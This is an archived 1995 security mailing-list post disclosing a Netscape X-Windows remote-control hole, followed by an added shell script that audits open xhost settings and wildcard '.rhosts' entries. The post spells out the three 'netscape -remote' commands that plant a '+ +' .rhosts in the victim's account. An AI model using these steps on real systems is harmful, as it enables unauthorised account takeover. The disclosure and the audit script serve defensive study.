..:-={{Underground Information Network}}=-:..
X-TREME & TECHNOTRONIC Security Collaboration Project
http://www.technotronic.com -=(c)=- http://www.x-treme.abyss.com

From owner-best-of-security@suburbia.net Sun Oct 1 00:05:17 1995
Return-Path:
Received: from yarrina.connect.com.au by mail4.netcom.com (8.6.12/Netcom) id AAA02886; Sun, 1 Oct 1995 00:05:08 -0700
Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id QAA03071 (8.6.12/IDA-1.6); Sun, 1 Oct 1995 16:51:45 +1000
Received: (majordom@localhost) by suburbia.net (8.6.12/Proff-950810) id QAA05895 for best-of-security-outgoing; Sun, 1 Oct 1995 16:31:31 +1000
Received: (proff@localhost) by suburbia.net (8.6.12/Proff-950810) id QAA05885 for best-of-security; Sun, 1 Oct 1995 16:31:19 +1000
Date: Sun, 1 Oct 1995 16:31:19 +1000
From: Julian Assange
Message-Id: <199510010631.QAA05885@suburbia.net>
To: best-of-security@suburbia.net
Subject: BoS: netscape/X remote control exploit
Sender: owner-best-of-security@suburbia.net
Errors-to: nobody@connect.com.au
Reply-To: nobody@connect.com.au
Status: RO

SOURCE: comp.security.unix
RE: Netscape remote control mechanism for X based clients.

* There's a huge hole in the Netscape remote control mechanism for the
* X-Windows based clients.
*
* Potential impact: anybody can become any user that uses Netscape on any
* system without sufficient X security.
*
* Let's suppose that you have an account on a target machine, where somebody
* is using Netscape, and either the xhost checking is disabled, or you can
* set the xhost yourself (e.g. if you have an account and the target user has
* no .Xauthority, as is frequent in university computer rooms).
*
* Then you can gain access to the target user's account using the following
* steps:
*
* - make a text file containing only "+ +" accessible (as file, as URL, or
*   whatever you like) to the target Netscape client. This is quite easy, either
*   if you have a personal WWW page (http://... URL) or an account on the
*   target machine (file://... URL), or even by uploading it to an anon FTP
* - set your DISPLAY environment variable to the target display
* - run the following set of commands:
*
*     netscape -noraise -remote "openURL()"
*     netscape -noraise -remote "saveAs(.rhosts)"
*     netscape -noraise -remote back
*
* In the second command, the path should be specified whenever possible
* (~ is not accepted).
*
* If the target user does not already have a .rhosts and is not looking at that
* precise moment, then the chances are it worked!
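The attack in the post needs two things on the victim's side: an X server whose access control is off (so a `-remote` command from another account is honoured) and, afterwards, a `.rhosts` that trusts every host and user. The following script is an added example written for this page, not part of the original post or of Netscape, and audits those two conditions. It takes its input as text so it runs offline against constructed samples; on a real box you would feed `xhost_open` the output of `xhost` and `rhosts_risky` the user's actual `~/.rhosts`. The `.rhosts` parsing follows the common `host [user]` format with `+` as a wildcard and `-` as a denial; treating `#` lines as comments is an assumption that matches typical implementations.

```sh
#!/bin/sh
# Added example (not from the original post): audit the two preconditions the
# post's attack relies on.

# xhost_open STRING: returns 0 if the given `xhost` output reports that access
# control is disabled (any client on any host may connect), 1 otherwise.
xhost_open() {
    printf '%s\n' "$1" | grep -q '^access control disabled'
}

# rhosts_risky FILE: prints every wildcard entry in a .rhosts-style file and
# returns 0 if at least one was found, 1 if none.  An entry is "host [user]";
# "+" as the host trusts every host, "+" as the user trusts every user.
# Entries beginning with "-" are denials and are not flagged.  Netgroup forms
# such as "+@group" are not exact "+" and are deliberately left alone.
# Skipping "#" comment lines is an assumption, not something rhosts(5) promises.
rhosts_risky() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }     # comments and blank lines
        $1 ~ /^-/                 { next }     # explicit denial, not a risk
        $1 == "+" || $2 == "+"    { print; found = 1 }
        END { exit found ? 0 : 1 }
    ' "$1"
}

# Constructed sample inputs for the offline demo (not captured from any host).
SAMPLE_XHOST='access control disabled, clients can connect from any host'
SAMPLE_RHOSTS='# trusted hosts
host1.example.org alice
-badhost.example.org
+ +'

demo() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_RHOSTS" > "$tmp"
    echo "wildcard entries in sample .rhosts:"
    rhosts_risky "$tmp" || echo "(none)"
    rm -f "$tmp"
    if xhost_open "$SAMPLE_XHOST"; then
        echo "X access control is disabled: -remote commands from other accounts will be honoured"
    fi
}
demo
```

On the sample data the only flagged line is `+ +`, which is exactly what the post's `saveAs(.rhosts)` step plants. A user with `xhost -` (or a proper `.Xauthority` and no `+` entries in `xhost`) is not reachable this way, because the `netscape -remote` commands never get a connection to the display in the first place.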